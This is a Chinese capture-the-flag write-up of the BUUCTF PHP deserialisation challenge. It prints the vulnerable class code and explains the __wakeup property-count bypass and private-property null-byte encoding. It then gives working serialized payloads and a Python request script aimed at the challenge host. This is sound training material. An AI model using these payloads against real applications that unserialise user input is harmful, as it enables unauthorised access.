BUUCTF之[极客大挑战 2019]PHP ------ PHP的序列化/反序列化
提示我们有备份网站,最终在www.zip
下找到这个备份文件。将它下载下来,可以得到index.php,class.php和flag.php。
首先是flag.php,这里面虽然有flag。但是这个flag是假的。
<?php
$flag = 'Syc{dog_dog_dog_dog}';
?>
然后就是index.php,你打开它后会发现它是WEB界面的那个代码。
最后,想要拿到真正的flag。需要从class.php下手
<?php
include 'flag.php';
error_reporting(0);
class Name{
private $username = 'nonono';
private $password = 'yesyes';
public function __construct($username,$password){
$this->username = $username;
$this->password = $password;
}
function __wakeup(){
$this->username = 'guest';
}
function __destruct(){
if ($this->password != 100) {
echo "</br>NO!!!hacker!!!</br>";
echo "You name is: ";
echo $this->username;echo "</br>";
echo "You password is: ";
echo $this->password;echo "</br>";
die();
}
if ($this->username === 'admin') {
global $flag;
echo $flag;
}else{
echo "</br>hello my friend~~</br>sorry i can't give you the flag!";
die();
}
}
}
?>
刚开始看到这份代码的时候,以为就只是个简单的反序列化题。所以设置payload:
O:4:"Name":2:{s:8:"username";s:5:"admin";s:8:"password";i:100;}
结果没过多久就被打脸了。发现到还有些知识点我还没学过。
首先是wakeup()函数: 与__sleep()函数相反,__sleep()函数,是在序列化时被自动调用。__wakeup()函数,在反序列化时,被自动调用。这个__wakeup()函数有个漏洞就是当反序列化字符串,表示属性个数的值大于真实属性个数时,会跳过 __wakeup 函数的执行。
然后是PHP的private(私有类)的反序列化: 可以参考PHP——serialize()序列化类变量public、protected、private的区别
最后,总结上面的知识,更改后的payload为:
O:4:"Name":3:{s:14:"\00Name\00username";s:5:"admin";s:14:"\00Name\00password";i:100;}
但是这个payload不可以直接在URL上提交,但是可以通过Python来提交得到flag
import requests
url ="http://60e43bd9-9892-464c-8bc9-57d246f55b67.node4.buuoj.cn/"
html = requests.get(url+'?select=O:4:"Name":3:{s:14:"\00Name\00username";s:5:"admin";s:14:"\00Name\00password";i:100;}')
print(html.text)
根据那些大佬说的,如果这个payload是在URL上提交的话。会因为编码问题,在传递\00
的时候会丢失。所以这里需要把\00
改成%00
。所以最后得到的payload为:
O:4:"Name":3:{s:14:"%00Name%00username";s:5:"admin";s:14:"%00Name%00password";i:100;}